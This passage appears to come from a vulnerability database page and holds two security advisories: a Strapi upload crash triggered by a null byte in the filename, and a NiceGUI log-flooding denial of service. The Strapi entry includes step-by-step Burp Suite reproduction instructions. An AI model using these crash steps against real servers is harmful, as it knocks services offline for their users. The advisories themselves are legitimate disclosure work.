at /mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/provider-upload-local/dist/index.js:71:33
at new Promise (<anonymous>)
at Object.uploadStream (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/provider-upload-local/dist/index.js:68:16)
at Object.uploadStream (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/register.js:80:35)
at Object.upload (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/services/provider.js:16:46)
at Object.uploadImage (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/services/upload.js:220:48) {
code: 'ERR_INVALID_ARG_VALUE'
}
Impact
Denial-of-Service occurs when a service becomes unavailable for users or other services. By sending a specially-crafted request, the server crashes without restarting. The entire server crashes with the thrown error instead of crashing only the single request and returning error 500 to the user. Any user with access to the file upload functionality is able to exploit this vulnerability, affecting applications running in both development mode and production mode as well.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@strapi/plugin-upload"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.22.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-31217"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2024-06-12T19:38:24Z",
"nvd_published_at": "2024-06-12T15:15:51Z",
"severity": "MODERATE"
},
"details": "### Summary\nA Denial-of-Service was found in the media upload process causing the server to crash without restarting, affecting either development and production environments.\n\n### Details\nUsually, errors in the application cause it to log the error and keep it running for other clients. This behavior, in contrast, stops the server execution, making it unavailable for any clients until it\u0027s manually restarted. \n\n### PoC\nDue to a bug in what we believe to be Burp\u2019s decoding system, we couldn\u2019t produce a valid file to easily reproduce the vulnerability. Instead, the issue can be reproduced by following these steps:\n1. Configure Burp\u2019s proxy between a browser and a Strapi server\n2. Log in and upload an image through the Media Library page while having Burp\u2019s interceptor turned on\n3. After capturing the upload POST request in Burp, add `%00` at the end of the file extension from the `Content-Disposition`, in the filename parameter (See reference image 1 below)\n4. Using the cursor, select the added `%00` and right-click it. Click in Convert selection \u003e URL \u003e URL decode to transform the selected text into a null byte\n5. Forward the modified request. The server should print an error and crash with the error `ERR_INVALID_ARG_VALUE` (See reference log 1 below)\n\nBy following the data flow, we reached the [line of code](https://github.com/strapi/strapi/blob/f1dd5cc8eef574bac6679aab6f93276e57497328/packages/providers/upload-local/src/index.ts#L86) where we believe the DoS is being caused.\nThe simpler way of fixing this vulnerability seems to be avoiding the error thrown by whitelisting the characters used in the extension.\n\n#### Reference Image 1\n\n\n#### Reference Log 1\n```\n[2024-03-22 10:23:42.629] http: POST /upload (22 ms) 400\nnode:internal/fs/utils:379\n const err = new ERR_INVALID_ARG_VALUE(\n ^\n\nTypeError [ERR_INVALID_ARG_VALUE]: The argument \u0027path\u0027 must be a string, Uint8Array, or URL without null bytes. Received \u0027/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/public/uploads/replaceme_png_88efe6a165.png\\x00\u0027\n at new WriteStream (node:internal/fs/streams:340:5)\n at Object.createWriteStream (node:fs:3123:10)\n at /mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/provider-upload-local/dist/index.js:71:33\n at new Promise (\u003canonymous\u003e)\n at Object.uploadStream (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/provider-upload-local/dist/index.js:68:16)\n at Object.uploadStream (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/register.js:80:35)\n at Object.upload (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/services/provider.js:16:46)\n at Object.uploadImage (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/services/upload.js:220:48) {\n code: \u0027ERR_INVALID_ARG_VALUE\u0027\n}\n```\n\n### Impact\nDenial-of-Service occurs when a service becomes unavailable for users or other services.\nBy sending a specially-crafted request, the server crashes without restarting. The entire server crashes with the thrown error instead of crashing only the single request and returning error 500 to the user.\nAny user with access to the file upload functionality is able to exploit this vulnerability, affecting applications running in both development mode and production mode as well.\n",
"id": "GHSA-pm9q-xj9p-96pm",
"modified": "2024-06-12T19:38:24Z",
"published": "2024-06-12T19:38:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/strapi/strapi/security/advisories/GHSA-pm9q-xj9p-96pm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31217"
},
{
"type": "WEB",
"url": "https://github.com/strapi/strapi/commit/a0da7e73e1496d835fe71a2febb14f70170135c7"
},
{
"type": "PACKAGE",
"url": "https://github.com/strapi/strapi"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "@strapi/plugin-upload has a Denial-of-Service via Improper Exception Handling"
}
GHSA-PQ7C-X8G4-RVP6
Vulnerability from github – Published: 2026-05-18 20:22 – Updated: 2026-06-09 10:58Summary
Two FastAPI routes that serve per-component static assets in NiceGUI accept a sub-path parameter that may resolve to a directory rather than a file. Requests that resolve to a directory raise an unhandled RuntimeError inside Starlette's FileResponse, which Uvicorn writes to the server log as a full traceback. Because the routes are reachable without authentication, a remote attacker can amplify log volume and consume disk and log-pipeline capacity on any publicly reachable NiceGUI server. There is no impact to confidentiality or integrity.
Details
The affected routes are the per-component resource route (added in v1.4.6) and the ESM module route (added in v3.0.0). Both join a user-supplied path segment with a registered base directory and pass the result to FileResponse. The existing existence check uses pathlib.Path.exists(), which returns True for directories — so a request whose sub-path resolves to a directory passes the guard and triggers an unhandled exception inside Starlette.
FastAPI has no default handler for RuntimeError, so each such request results in a 500 response and a multi-frame traceback in the server log.
Other NiceGUI-served paths (/static/..., /components/..., /libraries/...) are not affected; they do not use the same sub-path-to-FileResponse pattern.
Impact
A remote, unauthenticated attacker can repeatedly trigger the error condition with crafted requests. Each request emits roughly 100 lines of traceback in a default setup, and more when additional middleware layers are present. At sustained request rates this can:
- exhaust disk space on hosts with default log retention,
- saturate downstream log-shipping pipelines,
- generate alert fatigue or mask other events in monitoring.
There is no remote code execution, no path traversal, and no data exposure beyond the absolute installation path that already appears in any uncaught exception trace.
Workarounds
For deployments that cannot upgrade immediately:
- Place NiceGUI behind a reverse proxy that rejects requests where the path after
/_nicegui/<version>/esm/<key>/or/_nicegui/<version>/resources/<key>/is empty. - Rate-limit the
/_nicegui/prefix at the proxy. - Configure log rotation aggressively for the affected service.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.11.1"
},
"package": {
"ecosystem": "PyPI",
"name": "nicegui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.12.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45554"
],
"database_specific": {
"cwe_ids": [
"CWE-248",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-18T20:22:07Z",
"nvd_published_at": "2026-06-02T16:16:41Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nTwo FastAPI routes that serve per-component static assets in NiceGUI accept a sub-path parameter that may resolve to a directory rather than a file. Requests that resolve to a directory raise an unhandled `RuntimeError` inside Starlette\u0027s `FileResponse`, which Uvicorn writes to the server log as a full traceback. Because the routes are reachable without authentication, a remote attacker can amplify log volume and consume disk and log-pipeline capacity on any publicly reachable NiceGUI server. There is no impact to confidentiality or integrity.\n\n### Details\n\nThe affected routes are the per-component **resource** route (added in v1.4.6) and the **ESM module** route (added in v3.0.0). Both join a user-supplied path segment with a registered base directory and pass the result to `FileResponse`. The existing existence check uses `pathlib.Path.exists()`, which returns `True` for directories \u2014 so a request whose sub-path resolves to a directory passes the guard and triggers an unhandled exception inside Starlette.\n\nFastAPI has no default handler for `RuntimeError`, so each such request results in a 500 response and a multi-frame traceback in the server log.\n\nOther NiceGUI-served paths (`/static/...`, `/components/...`, `/libraries/...`) are not affected; they do not use the same sub-path-to-`FileResponse` pattern.\n\n### Impact\n\nA remote, unauthenticated attacker can repeatedly trigger the error condition with crafted requests. Each request emits roughly 100 lines of traceback in a default setup, and more when additional middleware layers are present. At sustained request rates this can:\n\n- exhaust disk space on hosts with default log retention,\n- saturate downstream log-shipping pipelines,\n- generate alert fatigue or mask other events in monitoring.\n\nThere is no remote code execution, no path traversal, and no data exposure beyond the absolute installation path that already appears in any uncaught exception trace.\n\n### Workarounds\n\nFor deployments that cannot upgrade immediately:\n\n- Place NiceGUI behind a reverse proxy that rejects requests where the path after `/_nicegui/\u003cversion\u003e/esm/\u003ckey\u003e/` or `/_nicegui/\u003cversion\u003e/resources/\u003ckey\u003e/` is empty.\n- Rate-limit the `/_nicegui/` prefix at the proxy.\n- Configure log rotation aggressively for the affected service.",
"id": "GHSA-pq7c-x8g4-rvp6",
"modified": "2026-06-09T10:58:12Z",
"published": "2026-05-18T20:22:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/zauberzeug/nicegui/security/advisories/GHSA-pq7c-x8g4-rvp6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45554"
},
{
"type": "PACKAGE",
"url": "https://github.com/zauberzeug/nicegui"
},
{
"type": "WEB",
"url": "https://github.com/zauberzeug/nicegui/releases/tag/v3.12.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "NiceGUI: Unauthenticated log-volume denial of service in dynamic resource routes"
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.